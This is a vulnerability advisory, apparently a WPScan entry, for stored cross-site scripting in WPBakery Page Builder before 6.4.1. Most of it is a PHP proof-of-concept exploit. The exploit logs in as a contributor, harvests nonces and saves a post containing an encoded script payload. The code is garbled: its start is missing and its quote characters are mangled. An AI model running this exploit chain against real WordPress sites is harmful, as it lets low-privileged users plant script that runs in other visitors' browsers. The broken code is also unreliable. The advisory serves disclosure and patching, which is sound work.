Chloe ChamberlandWPVDB-ID:11285589-1B22-4EC0-ADFC-F2ADD70DB4D7WPBakery Page Builder < 6.4.1 - Authenticated Stored Cross-Site Scripting (XSS)
0.001 Low
EPSS
Percentile
25.0%
Wordfence discovered an Authenticated Stored Cross-Site Scripting (XSS) security vulnerability within the WPBakery Page Builder WordPress plugin. The vulnerability could allow a low privileged user, such as contributor, to inject malicious JavaScript into posts.
PoC
“Exploit Post”, “content” => "\n
Test2
\n", “status”=>“pending”); $postdata = json_encode($data); //Get Json post data length $length = strlen($postdata); echo ‘Logging in!’; // 1) Log in as contributor+ $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), ‘cookiejar-’); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-login.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘log’ => $wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); echo ‘Grabbing Rest API!’; // Pull the Rest API Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/post-new.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //Rest API Nonce preg_match(‘/wp\.apiFetch\.createNonceMiddleware\(\s"([^“]+)”\s\)/’, $content, $matches); $restnonce = $matches[1]; echo ‘Creating New Post and Grabbing Page ID!’; //Create New Post $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-json/wp/v2/posts’); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, “POST”); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt( $ch, CURLOPT_HTTPHEADER, array(‘Content-Type: application/json’, “X-WP-Nonce: $restnonce”, “Content-Length: $length”)); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); $content = curl_exec($ch); curl_close($ch); //Grab the page-id preg_match(‘/“id”:([^"]+),/’, $content, $matches); $pageid = $matches[1]; echo ‘Grabbing VC Nonce!’; //Grab Some More Nonces $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/post.php?post_id=’ . $pageid . ‘&vc;_action=vc_inline’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //WPBAKERY NONCE preg_match(‘/vcAdminNonce\s=\s'([^"]+)';/’, $content, $matches); $vcnonce = $matches[1]; echo ‘XSS'ing!’; //EDIT THE POST WITH XSS! $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘post_id’ => $pageid, ‘vc_inline’ => ‘true’, ‘_vcnonce’ => $vcnonce, ‘vc_post_custom_css’ => ‘’, ‘action’ => ‘vc_save’, ‘content’ => ’
[vc_row][vc_column][vc_raw_js]JTNDc2NyaXB0JTNFJTIwYWxlcnQlMjglMjAlMjJFdmlsJTIwU2NyaXB0JTIwSGVyZSUyMSUyMiUyMCUyOSUyMCUzQyUyRnNjcmlwdCUzRQ==[/vc_raw_js][/vc_column][/vc_row]’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>
| CPE | Name | Operator | Version |
|---|---|---|---|
| js_composer | lt | 6.4.1 |
Related
